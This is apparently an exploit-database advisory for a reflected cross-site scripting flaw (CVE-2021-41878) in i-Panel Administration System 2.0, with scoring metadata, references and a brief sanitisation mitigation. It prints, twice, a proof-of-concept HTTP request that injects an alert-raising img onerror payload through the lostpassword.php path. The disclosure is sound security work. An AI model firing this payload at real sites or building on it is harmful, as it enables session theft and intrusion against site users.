i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)

vendor:

Administration System

by:

Forster Chiu

6.1

CVSS

MEDIUM

Reflected Cross-site Scripting (XSS)

CWE

Product Name: Administration System

Affected Version From: 2

Affected Version To: 2

Patch Exists: YES

Related CWE: CVE-2021-41878

CPE: 2.0:i-panel:administration_system:2.0

Metasploit:

Other Scripts:

Tags: cve,cve2021,ipanel,xss,packetstorm

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Nuclei References: https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html, https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-41878, https://nvd.nist.gov/vuln/detail/CVE-2021-41878, http://packetstormsecurity.com/files/164519/i-Panel-Administration-System-2.0-Cross-Site-Scripting.html

Nuclei Metadata: {'max-request': 1, 'verified': True, 'vendor': 'hkurl', 'product': 'i-panel_administration_system'}

Platforms Tested: Chrome, Edge and Firefox

2021

i-Panel Administration System 2.0 – Reflected Cross-site Scripting (XSS)

An alert box can be generated with the following payload: GET /lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E HTTP/1.1 Host: Forster Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cookie: PHPSESSID=7db442d0ed0f9c8e21f5151c3711973e User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept-Language: en-gb Accept-Encoding: gzip, deflate Connection: close

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

# Exploit Title: i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)
# Date: 04.10.2021
# Exploit Author: Forster Chiu
# Vendor Homepage: https://www.hkurl.com
# Version: 2.0
# Tested on: Chrome, Edge and Firefox
# CVE: CVE-2021-41878
# Reference: https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html

As a proof of concept, an alert box can be generated with the following payload.
Exploit PoC:

GET /lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E HTTP/1.1
Host: Forster
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: PHPSESSID=7db442d0ed0f9c8e21f5151c3711973e
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
Connection: close